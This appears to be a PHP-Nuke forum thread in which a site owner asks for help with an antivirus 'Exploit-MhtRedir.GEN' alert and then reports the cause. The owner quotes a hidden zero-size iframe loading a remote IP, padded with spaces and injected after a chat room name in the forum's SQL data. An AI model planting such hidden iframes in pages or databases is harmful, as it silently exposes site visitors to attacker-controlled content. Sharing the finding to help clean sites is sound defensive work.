>>
Site Map
>>
Forums
>>
General 6x
Forum module - topics in forum:
General 6x - Discussions reagarding any other PHP-Nuke Problems.
VIRUS!!!
apparently i have a virus on my embedded forum Exploit-MhtRedir.GEN What do i do?
http://www.microsoft.com/technet/security/bulletin/MS04-013.mspx

Found this
http://www.nukecops.com/postt37460.html
Never come across it myself or even heard of it.
Weel - I don't see what that MS security bulletin dated April 13, 2004 regarding a Cumulative Security Update for Outlook Express has anything to do with this exploit.... as it relates to mhtml for mail clients.... nothing to do with Nuke - the exploit on your site is slightly different - have a read of the link Dar posted and check the areas mentioned in that thread.
Do you have the webmail module active by any chance - if so deactivate it.
thanks guys! well i found this rouge code attached to php_nuke_forums SQL
<iframe src="http://204.2.105.109/" width=0 height=0></iframe>
it had lots of spaces before and after it and was added after the name of one of the chat rooms, very clever was hidden well!
thanks for your help and i sorted it now!
i had something like that in one of my nukes sites last year. unfortunately i can't remember what i did to cure it.